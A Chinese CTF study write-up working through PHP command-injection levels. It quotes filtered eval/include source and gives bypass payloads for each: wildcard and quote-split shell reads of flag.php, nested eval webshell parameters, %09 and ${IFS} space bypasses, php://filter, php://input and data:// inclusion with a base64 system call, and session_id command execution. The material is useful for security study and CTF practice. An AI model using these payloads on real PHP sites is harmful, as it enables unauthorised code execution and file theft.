本文共 4403 字,大约阅读时间需要 14 分钟。
校队考核被打自闭了 回炉重造
echo `nl ????.???`; # 显示文本内容与行号echo `tail ????.???`;# 只看文本的后几行echo `cat ????.???`; # 从第一行开始显示文本内容echo `more ????.???`; # 一页一页的显示文本内容echo `less ????.???`; # 与 more 类似,但是比 more 更好的是,它可以往前翻页!echo `head ????.???`; # 只看文本的前面几行echo `tac ????.???`; # 从最后一行开始显示文本echo `nl fla''g.php`;echo `nl f*`;
c=eval($_GET[1])?>&1=system('cat flag.php');c=?> 总结:
- 没有过滤 *和?这两个通配符的时候 *代表0个或多个任意字符 ?匹配一个字符
- nl tail cat more less tac head七个命令都可以查看文件
- 如果只过滤了flag cat这些完整的字符串 可以通过’'绕过
- 调用system函数返回的是该函数执行返回值,比如0表示执行正确,-1执行错误;同时会将cmd命令的结果打印到控制台界面;
- 而反引号
直接返回的就是该cmd的执行结果,但是不会屏幕上表现出来。- 嵌套eval构造一句话木马 这个方法我想到过 但是我没想到嵌套eval tcl
- ?><?=这是一个神奇的东西 自己搭建环境展示一下
<?=”是PHP的一个短的开放式标签,是echo() 的快捷用法
如何想要使用该短标签,必须从PHP.ini文件中的设置启用它。 我们需要在PHP.ini文件中找到以下行并添加(On)来开启,
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} echo `nl fl''ag.p''hp`;
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} echo`nl%09f*`;?> &1=system('cat flag.php');eval($_GET[1]);&1=system('cat flag.php'); 1.与前面的题目相比,考点在于空格的过滤
2.绕过方法 %09 ${IFS}、$IFS$9、<>、<
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} echo、`、;、(c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} "有点迷c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
//flag in flag.phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__);} ?c=php://input hackbar POST传参 ?c=data://text/plain,system('cat f*');?>?c=data://text/plain,base64;PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg== include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。
伪协议中的data://text/plain,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行 伪协议中的php://input,同样原理
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|php|file/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__);} -payload:
c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==
error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c.".php"); } }else{ highlight_file(__FILE__);} c=data://text/plain,
- 提示:data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用
- 我不太理解为啥php://input失效了
- 等等补坑
if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} c=session_start();system(session_id());
PHPSESSID=ls这样的话就可以达到命令执行的效果了接着直接改成 c=session_start();highlight_file(session_id());然后PHPSESSID的值修改为flag.php就出问题了。
经过测试发现,受php版本影响 5.5 -7.1.9均可以执行,因为session_id规定为0-9,a-z,A-Z,-中的字符。在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。 转载自羽大佬